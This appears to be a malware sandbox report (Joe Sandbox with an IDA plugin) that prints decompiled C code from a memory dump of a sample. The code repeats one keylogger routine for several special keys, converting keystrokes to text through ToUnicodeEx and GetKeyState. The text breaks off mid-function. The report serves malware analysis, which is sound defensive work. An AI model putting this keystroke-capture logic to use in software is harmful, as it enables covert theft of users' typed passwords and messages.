Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F1], xrefs: 00C85AA0

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D57, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D57(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Page Up]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d57
0x00c85d5e
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Page Up], xrefs: 00C85D59
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A8D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A8D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[End]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a8d
0x00c85a94
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[End], xrefs: 00C85A8F
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8587E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8587E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Esc]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8587e
0x00c85885
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[Esc], xrefs: 00C85880
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D24, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D24(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Num Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d24
0x00c85d2b
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Num Lock], xrefs: 00C85D26
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B04, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B04(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F15]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b04
0x00c85b0b
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F15], xrefs: 00C85B06
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B6A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B6A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
